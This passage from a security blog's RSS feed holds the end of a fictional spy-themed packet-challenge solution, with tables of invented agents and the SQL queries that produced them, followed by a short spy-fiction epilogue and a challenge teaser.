<td valign="top" width="213">Pete Michaels</td>
<td valign="top" width="213">Pubmeister</td>
<td valign="top" width="213">Nickname used by acquaintances and customers</td>
</tr>
<tr>
<td valign="top" width="213">Real name unknown</td>
<td valign="top" width="213">The Guatrau</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Roberto Tablato</td>
<td valign="top" width="213">Little Bobby Tables</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Roberto Tablato</td>
<td valign="top" width="213">Silky Suzy</td>
<td valign="top" width="213">Assigned by SIBHOD; only uses this alias on Friday nights at The Pink Oyster Social Club (MARKET)</td>
</tr>
<tr>
<td valign="top" width="213">Steve Austen</td>
<td valign="top" width="213">Kim Philby</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Steve Austen</td>
<td valign="top" width="213">Stanley</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Susan Jones</td>
<td valign="top" width="213">Barbie</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
</tbody>
</table>
<p><code><em>SELECT<br />
Person.Name, Alias.Alias_Name, Alias.Notes<br />
FROM<br />
Person<br />
INNER JOIN Alias ON (Person.ID = Alias.Person_FK)<br />
ORDER BY<br />
Person.Name</em></code></p>
<p>Organizational Hierarchy:</p>
<p>Susan Jones reports to Pete Michaels<br />
Pete Michaels, Donald Burgess, Kerry Nitpick, and Roberto Tablato report to Dave Nice<br />
Dave Nice and Steve Austen report to The Boss (Name unknown).</p>
<p><code><em>SELECT<br />
Person.Name as 'Person',<br />
Boss.Name as 'Boss'<br />
FROM<br />
Person Boss<br />
INNER JOIN Person ON (Person.Reports_To = Boss.ID)<br />
ORDER BY<br />
Boss.Name</em></code></p>
<h3>Determine where these people have &#8220;day jobs&#8221;</h3>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="160"><strong>Name</strong></td>
<td valign="top" width="160"><strong>Organization Name</strong></td>
<td valign="top" width="160"><strong>Job description</strong></td>
</tr>
<tr>
<td valign="top" width="160">Dave Nice</td>
<td valign="top" width="160">The Sinister Icy Black Hand of Death</td>
<td valign="top" width="160">Agent handler. The best looking, most skilled operative on SIBHOD&#8217;s payroll haha</td>
</tr>
<tr>
<td valign="top" width="160">Donald Burgess</td>
<td valign="top" width="160">Yellow Sun Heavy Industries</td>
<td valign="top" width="160">Employed as a low-level tech support worker. Hasn&#8217;t been promoted in over ten years. Easily manipulated</td>
</tr>
<tr>
<td valign="top" width="160">Garry Francis</td>
<td valign="top" width="160">MacDoddy&#8217;s</td>
<td valign="top" width="160">Flips burgers</td>
</tr>
<tr>
<td valign="top" width="160">Garry Francis</td>
<td valign="top" width="160">The Picture House</td>
<td valign="top" width="160">Mans the popcorn booth</td>
</tr>
<tr>
<td valign="top" width="160">Kerry Nitpick</td>
<td valign="top" width="160">The Sinister Icy Black Hand of Death</td>
<td valign="top" width="160">Technical support (client side exploits)</td>
</tr>
<tr>
<td valign="top" width="160">Pete Michaels</td>
<td valign="top" width="160">The Rose and Crown Pub</td>
<td valign="top" width="160">Bartender</td>
</tr>
<tr>
<td valign="top" width="160">Real name unknown</td>
<td valign="top" width="160">The Sinister Icy Black Hand of Death</td>
<td valign="top" width="160">The Boss. Do what he says.</td>
</tr>
<tr>
<td valign="top" width="160">Roberto Tablato</td>
<td valign="top" width="160">The Sinister Icy Black Hand of Death</td>
<td valign="top" width="160">Technical support (web appsec)</td>
</tr>
<tr>
<td valign="top" width="160">Steve Austen</td>
<td valign="top" width="160">The Sinister Icy Black Hand of Death</td>
<td valign="top" width="160">Recruiter. Keeps his distance in order to remain covert long-term. Aside from New Potential Recruits <em>(GREENHILLS)</em>, only The Guatrau has ever met him in person; possibly schoolfriends?</td>
</tr>
<tr>
<td valign="top" width="160">Susan Jones</td>
<td valign="top" width="160">Yellow Sun Heavy Industries</td>
<td valign="top" width="160">HR secretary dating Pete Michaels. Loves to gossip about co-workers. Abuses her position in HR to feed her addiction to gossip. Unwittingly supplies Michaels with useful information</td>
</tr>
</tbody>
</table>
<p><code><em>SELECT<br />
Person.Name,<br />
Organisation.Name,<br />
Employment."Job description"<br />
FROM<br />
Person<br />
INNER JOIN Employment ON (Person.ID = Employment.Person_FK)<br />
INNER JOIN Organisation ON (Employment.Organisation_Fk = Organisation.ID)<br />
ORDER BY<br />
Person.Name</em></code></p>
<h3>Determine details of their cover placements in target organisations, their mission objectives, and which aliases are used for each placement</h3>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="160"><strong>Name</strong></td>
<td valign="top" width="160"><strong>Alias_Name</strong></td>
<td valign="top" width="160"><strong>Organization Name</strong></td>
<td valign="top" width="160"><strong>Mission objectives</strong></td>
</tr>
<tr>
<td valign="top" width="160">Kerry Nitpick</td>
<td valign="top" width="160">Arnold Davies</td>
<td valign="top" width="160">NybbleComms</td>
<td valign="top" width="160">Embed backdoors into the guidance software of tactical cruise missiles from NybbleComms<em> (CANDYSTORE)</em>. Once we have the ability to control an arbitrary missile in flight, the Guatrau wants a flashy joystick to go on his desk to fly them with</td>
</tr>
<tr>
<td valign="top" width="160">Roberto Tablato</td>
<td valign="top" width="160">Silky Suzy</td>
<td valign="top" width="160">The Pink Oyster Social Club</td>
<td valign="top" width="160">Work Friday nights as a hostess &#8211; uses this position to get &#8220;close&#8221; to patrons for intel gathering and blackmail purposes. Just don&#8217;t ask how close he gets&#8230;.</td>
</tr>
<tr>
<td valign="top" width="160">Pete Michaels</td>
<td valign="top" width="160">Argus</td>
<td valign="top" width="160">The Rose and Crown Pub</td>
<td valign="top" width="160">Overhear the conversations of intoxicated Yellow Sun <em>(GOLDMINE)</em> employees. Use this together with intel from Barbie to supply New Potential Recruits <em>(GREENHILLS)</em> to Stanley</td>
</tr>
<tr>
<td valign="top" width="160">Donald Burgess</td>
<td valign="top" width="160">Homer Hicks</td>
<td valign="top" width="160">Yellow Sun Heavy Industries</td>
<td valign="top" width="160">Obtain the plans to Project ThatsNoMoon from Yellow Sun <em>(GOLDMINE)</em>. Short-term throwaway asset. Has extremely limited tradecraft, and is likely to be a liability once used &#8211; cut all ties immediately he delivers useful assets</td>
</tr>
<tr>
<td valign="top" width="160">Susan Jones</td>
<td valign="top" width="160">Barbie</td>
<td valign="top" width="160">Yellow Sun Heavy Industries</td>
<td valign="top" width="160">Long-term asset. Has no idea she&#8217;s being used by Argus to supply information on Yellow Sun <em>(GOLDMINE)</em> employees.</td>
</tr>
</tbody>
</table>
<p><code><em> SELECT<br />
Person.Name,<br />
Alias.Alias_Name,<br />
Organisation.Name,<br />
AgentPlacement."Mission objectives"<br />
FROM<br />
AgentPlacement<br />
INNER JOIN Organisation ON (AgentPlacement.Organisation_Fk = Organisation.ID)<br />
INNER JOIN Alias ON (AgentPlacement.Alias_FK = Alias.ID)<br />
INNER JOIN Person ON (Alias.Person_FK = Person.ID)</em></code></p>
<h3>If possible, determine what the agents look like</h3>
<div id="attachment_1291" class="wp-caption aligncenter" style="width: 188px"><a href="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png"><img class="size-full wp-image-1291 " title="Donald Burgess" src="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png?w=450" alt="Donald Burgess"   /></a><p class="wp-caption-text">Donald Burgess</p></div>
<div id="attachment_1386" class="wp-caption aligncenter" style="width: 188px"><a href="http://wirewatcher.files.wordpress.com/2011/08/roberto-tablato.png"><img class="size-full wp-image-1386" title="Roberto Tablato" src="http://wirewatcher.files.wordpress.com/2011/08/roberto-tablato.png?w=450" alt="Roberto Tablato"   /></a><p class="wp-caption-text">Roberto Tablato</p></div>
<div id="attachment_1387" class="wp-caption aligncenter" style="width: 190px"><a href="http://wirewatcher.files.wordpress.com/2011/08/silky-suzy.png"><img class="size-full wp-image-1387" title="Roberto Tablato as Silky Suzy" src="http://wirewatcher.files.wordpress.com/2011/08/silky-suzy.png?w=450" alt="Roberto Tablato as Silky Suzy"   /></a><p class="wp-caption-text">Roberto Tablato as Silky Suzy</p></div>
<div id="attachment_1344" class="wp-caption aligncenter" style="width: 188px"><a href="http://wirewatcher.files.wordpress.com/2011/08/ultravenona.png"><img class="size-full wp-image-1344" title="Dave Nice" src="http://wirewatcher.files.wordpress.com/2011/08/ultravenona.png?w=450" alt="Dave Nice"   /></a><p class="wp-caption-text">Dave Nice</p></div>
<div id="attachment_1384" class="wp-caption aligncenter" style="width: 190px"><a href="http://wirewatcher.files.wordpress.com/2011/08/al-murray.png"><img class="size-full wp-image-1384" title="Pete Michaels" src="http://wirewatcher.files.wordpress.com/2011/08/al-murray.png?w=450" alt="Pete Michaels"   /></a><p class="wp-caption-text">Pete Michaels</p></div>
<div id="attachment_1385" class="wp-caption aligncenter" style="width: 190px"><a href="http://wirewatcher.files.wordpress.com/2011/08/kerry-nitpick-from-police-wanted-poster.png"><img class="size-full wp-image-1385" title="Kerry Nitpick" src="http://wirewatcher.files.wordpress.com/2011/08/kerry-nitpick-from-police-wanted-poster.png?w=450" alt="Kerry Nitpick"   /></a><p class="wp-caption-text">Kerry Nitpick</p></div>
<div id="attachment_1388" class="wp-caption aligncenter" style="width: 190px"><a href="http://wirewatcher.files.wordpress.com/2011/08/susan-jones.png"><img class="size-full wp-image-1388" title="Susan Jones" src="http://wirewatcher.files.wordpress.com/2011/08/susan-jones.png?w=450" alt="Susan Jones"   /></a><p class="wp-caption-text">Susan Jones</p></div>
<div id="attachment_1389" class="wp-caption aligncenter" style="width: 190px"><a href="http://wirewatcher.files.wordpress.com/2011/08/garry-francis.png"><img class="size-full wp-image-1389" title="Garry Francis" src="http://wirewatcher.files.wordpress.com/2011/08/garry-francis.png?w=450" alt="Garry Francis"   /></a><p class="wp-caption-text">Garry Francis</p></div>
<p><em>(Get this lot out of the photo table)</em></p>
<h3>If possible, speculate on the means by which Burgess was identified and recruited, and the existence of Project ThatsNoMoon leaked</h3>
<p>Burgess AKA Homer Hicks was probably identified and recruited while drinking at the Rose and Crown Club</p>
<h3>If any arrests are to be made, when and where might be best to round up as many members of the Adversary at once?</h3>
<p>SIBHOD and friends team day out!</p>
<p>The Picture House Cinema on the High Street <em>(HAPPYLAND)</em>, Saturday the 16<sup>th</sup> Popcorn Stall <em>(BLACK TWO) </em>at 2:30. Mac Doddy’s <em>(SODIUM) </em>is giving away Kung Fu Panda toys in their happy meals <em>(COWABUNGA)</em>, so they will eat there first.</p>
<p>Everyone will be suspected compromised for the duration of the outing <em>(UTOPIA)</em>. They will not group up before reaching the popcorn stall.  Won’t sit in groups of more than 2 at MacDoddy’s.</p>
<p>Attendance should be: Dave, Bobby, Kerry,Pete, and Garry</p>
<h3>Speculate on the reason for Starr&#8217;s sudden exit and subsequent disappearance</h3>
<p>Starr (Kerry Nitpick) became tense and agitated and exited because once he started inspecting the data he realized that his employer, SIBHOD, was the adversary, and the person he just hacked, ULTRAVENONA, is actually his boss, Dave Nice!</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
Great work, Jeff! Despite Yellow Sun&#8217;s total vetting failure in employing Keith Starr aka Kerry Nitpick, they have totally unpicked SIBHOD&#8217;s operations. The only question now is what they will choose to do with this information &#8211; stay tuned for Part III!</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1338/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1338/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1338/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1338&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/08/14/the-spy-hunter-part-ii-solution/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune1.png" medium="image">
			<media:title type="html">OperationNEPTUNE1</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune2.png" medium="image">
			<media:title type="html">OperationNEPTUNE2</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune3.png" medium="image">
			<media:title type="html">OperationNEPTUNE3</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune4.png" medium="image">
			<media:title type="html">OperationNEPTUNE4</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune5.png" medium="image">
			<media:title type="html">OperationNEPTUNE5</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/07/spectrogram.png" medium="image">
			<media:title type="html">Spectrogram</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/07/coagula.png" medium="image">
			<media:title type="html">Coagula</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/operationneptune6.jpeg" medium="image">
			<media:title type="html">OperationNEPTUNE6</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png" medium="image">
			<media:title type="html">Donald Burgess</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/roberto-tablato.png" medium="image">
			<media:title type="html">Roberto Tablato</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/silky-suzy.png" medium="image">
			<media:title type="html">Roberto Tablato as Silky Suzy</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/ultravenona.png" medium="image">
			<media:title type="html">Dave Nice</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/al-murray.png" medium="image">
			<media:title type="html">Pete Michaels</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/kerry-nitpick-from-police-wanted-poster.png" medium="image">
			<media:title type="html">Kerry Nitpick</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/susan-jones.png" medium="image">
			<media:title type="html">Susan Jones</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/08/garry-francis.png" medium="image">
			<media:title type="html">Garry Francis</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>The Spy Hunter, Part II &#8211; Epilogue</title>
		<link>http://wirewatcher.wordpress.com/2011/08/10/the-spy-hunter-part-ii-epilogue/</link>
		<comments>http://wirewatcher.wordpress.com/2011/08/10/the-spy-hunter-part-ii-epilogue/#comments</comments>
		<pubDate>Wed, 10 Aug 2011 16:42:45 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Packet Challenge]]></category>
		<category><![CDATA[Spy Hunter]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1300</guid>
		<description><![CDATA[Kerry Nitpick wanted to run. But to do so would be to draw attention to himself, to &#8220;show out&#8221; as the pavement artists call it. He did not know if the surveillance team following him was real or merely in his imagination, but either way he was certain they were there. They&#8217;d probably been on [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1300&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://wirewatcher.files.wordpress.com/2011/07/kerry-nitpick-from-ys-id-badge.png"><img class="alignleft size-thumbnail wp-image-1303" title="Kerry Nitpick" src="http://wirewatcher.files.wordpress.com/2011/07/kerry-nitpick-from-ys-id-badge.png?w=90&#038;h=90" alt="" width="90" height="90" /></a></p>
<p>Kerry Nitpick wanted to run. But to do so would be to draw attention to himself, to &#8220;show out&#8221; as the pavement artists call it. He did not know if the surveillance team following him was real or merely in his imagination, but either way he was certain they were there.</p>
<p>They&#8217;d probably been on him since he left Yellow Sun HQ thirty minutes ago. YS hadn&#8217;t trusted him from day one &#8211; they&#8217;d likely been watching him ever since. The team was probably plotted up away from the building; no need to have their <em>own</em> eyes-on in such a controlled environment. That goon in the security hut at the gate must have been the trigger.</p>
<p>An aware target masquerading as an unaware one, Kerry strained his hearing, trying to hear them on their radios.</p>
<address><strong>RED</strong> has the eyeball<br />
<strong>GREEN</strong> backing<br />
<strong>BLUE</strong>, I&#8217;m on the other side of the street</address>
<p>Despite the odds, the advantage was still his. He knew that as he turned left onto Laker Street <a title="SIBHOD Surveillance Training Manual" href="http://wirewatcher.wordpress.com/supplemental-files/sibhod-surveillance-training-manual/" target="_blank">they&#8217;d do their silly little dance</a>, same as always, regular as clockwork.</p>
<address><strong>RED</strong>, Target is approaching nearside turn onto Laker Street</address>
<address><strong>BLUE</strong> moving up to cover</address>
<p>He&#8217;d be able to see Blue now if he looked over his right shoulder. He considered taking an extra step or two before turning the corner just to rattle them, but that would have tipped them off that he knew they were there. &#8220;Never let them know that you know,&#8221; Dave always used to say, &#8220;That&#8217;s Rule #1.&#8221; Rule #1 changed with the wind, but this one had held the title at least once.</p>
<p>He turned left onto Laker Street.</p>
<address><strong>RED</strong> that&#8217;s the target Left Left onto Laker Street; <a title="SIBHOD Surveillance Training Manual" href="http://wirewatcher.wordpress.com/supplemental-files/sibhod-surveillance-training-manual/" target="_blank">handover</a></address>
<address><strong>BLUE</strong> has the eyeball. Target proceeding, corner is clear</address>
<address><strong>GREEN</strong> turning Left Left; I have the eyeball</address>
<address><strong>BLUE</strong> backing</address>
<address><strong>RED</strong>, I&#8217;m on the other side of the street</address>
<p>Laker Street was routinely pounded by suburban traffic, rattling the sash windows of the tall Victorian homes on the left hand side. Most properties had basements with steps leading down from the street; RED ONE was one such basement flat, number 221b. As he passed it he looked as closely as he could without turning his head. Everything seemed in order, but he certainly wasn&#8217;t going in through the front door. RED ONE was chosen for a very good reason, one which the surveillance team was soon to discover to their cost.</p>
<p>Leaving the steps to RED ONE behind, he maintained his pace but quickened his thoughts. The next left turn onto Kingsway had to be just right &#8211; he&#8217;d have three or four seconds tops to evade his pursuers. The window was tight, but terrain was on his side.</p>
<p><em><strong>GREEN</strong>, Target is approaching nearside turn onto Kingsway</em><br />
<em><strong>RED</strong> There&#8217;s no more footpath &#8211; I can&#8217;t move up to cover the corner! There&#8217;s too much traffic for me to step into the road</em><br />
<em><strong>GREEN</strong>, That&#8217;s understood. If the Target takes the nearside turn I&#8217;ll clear the corner myself and we&#8217;ll carry out cornering drill without you. Catch up when you can<br />
<strong>RED</strong>, That&#8217;s received</em></p>
<p>With Red neutered by the short footpath, Kerry turned left onto Kingsway, passing the corner shop. As he did so he removed his jacket and increased his walk almost to a jog.</p>
<p><em><strong>GREEN</strong> that&#8217;s the Target Left Left onto Kingsway. Temporarily unsighted<strong><br />
</strong></em></p>
<p>Out of sight of the surveillance team, Kerry turned left one last time into the alleyway alongside the corner shop. Running now, he made for the rubbish bin that stood in front of the six foot gate that blocked further passage and obscured the alley&#8217;s access to the rear of the properties on Laker Street.</p>
<p><em><strong>GREEN</strong>, I&#8217;m crossing Kingsway. No sign of Target. Loss, Loss</em></p>
<p>Lent by adrenaline the agility of a fitter man, he leapt onto the bin and threw his jacket over the thin strand of barbed wire that topped the gate. He hauled himself over and down the other side, tugging the shredded remains of his jacket behind him.</p>
<p><em><strong>BLUE</strong> turning Left Left onto Kingsway. No sign of Target. Loss, Loss</em></p>
<p>Moving down the alleyway to the rear entrance of number 221b, the surveillance team&#8217;s comms chatter faded to silence.</p>
<p><em><strong>GREEN</strong>, Total Loss, Total Loss. Commence search pattern</em></p>
<p>Finally inside RED ONE, Kerry took stock. It was supposed to be a straightforward penetration job; a simple exploit, lift some assets, get out. It would have been <em>so</em> much better had the target not turned out to be his boss, his <em>real</em> boss. All this &#8220;need to know&#8221; nonsense just gets a man into trouble. Why hadn&#8217;t Dave told him SIBHOD had already penetrated Yellow Sun? Why wouldn&#8217;t Yellow Sun tell him who the target was? Keith Starr would never have taken the job if he&#8217;d known.</p>
<p>So he did the best he could. He wasn&#8217;t going to give Yellow Sun anything that would damage SIBHOD; instead he turned over part of Dave&#8217;s tasteless music collection, plus his shopping list and his IE cache. Total junk, but better than nothing. It certainly bought him a ticket out of Yellow Sun&#8217;s front door.</p>
<p>But what to do next? From the files he turned over to Yellow Sun, he was certain there was nothing that could link him to either Dave or SIBHOD. Keith Starr&#8217;s professional reputation would take a bit of a hit, but if he kept his mouth shut, no harm done, surely? Or perhaps he <em>should</em> come clean to Dave, at least to tell him to update his PDF reader. Or maybe silence is golden &#8211; SIBHOD is not an organisation that tolerates failure&#8230;</p>
<blockquote><p>A full write up of the winning solution to the Spy Hunter Part II Packet challenge is <a title="The Spy Hunter, Part II – Solution" href="http://wirewatcher.wordpress.com/2011/08/14/the-spy-hunter-part-ii-solution/" target="_blank">here</a>!</p></blockquote>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1300/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1300/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1300/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1300&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/08/10/the-spy-hunter-part-ii-epilogue/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/07/kerry-nitpick-from-ys-id-badge.png?w=150" medium="image">
			<media:title type="html">Kerry Nitpick</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>The Spy Hunter, Part II</title>
		<link>http://wirewatcher.wordpress.com/2011/07/13/the-spy-hunter-part-ii/</link>
		<comments>http://wirewatcher.wordpress.com/2011/07/13/the-spy-hunter-part-ii/#comments</comments>
		<pubDate>Wed, 13 Jul 2011 13:06:02 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Packet Challenge]]></category>
		<category><![CDATA[Spy Hunter]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1290</guid>
		<description><![CDATA[In the wake of the Donald Burgess affair, Yellow Sun Heavy Industries finds itself in an uncomfortable situation. The top secret plans for Project ThatsNoMoon are in the hands of an unknown Adversary, and the traitorous Burgess has disappeared. Only by taking positive action of its own can Yellow Sun hope to salvage the situation&#8230; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1290&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><em><a href="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png"><img class="size-thumbnail wp-image-1291 alignleft" title="Donald Burgess, aka HomerHicks" src="http://wirewatcher.files.wordpress.com/2011/07/homerhicks.png?w=90&#038;h=90" alt="Donald Burgess, aka HomerHicks" width="90" height="90" /></a></em><em>In the wake of the <a title="The Spy Hunter, Part I" href="http://wirewatcher.wordpress.com/2010/08/23/packet-challenge-the-spy-hunter/" target="_blank">Donald Burgess affair</a>, Yellow Sun Heavy Industries finds itself in an uncomfortable situation. The top secret plans for Project ThatsNoMoon are in the hands of an unknown Adversary, and the traitorous Burgess has disappeared. </em></p>
<p><em>Only by taking positive action of its own can Yellow Sun hope to salvage the situation&#8230;</em></p>
<p>Evidence has been collected as the result of offensive action on the part of Yellow Sun against their unknown Adversary. Are you up to the challenge of maximising the haul&#8217;s intelligence yield? <a href="http://ismellpackets.com/2011/07/13/the-spy-hunter-2-packet-challenge/" target="_blank">Click here to find out!</a></p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
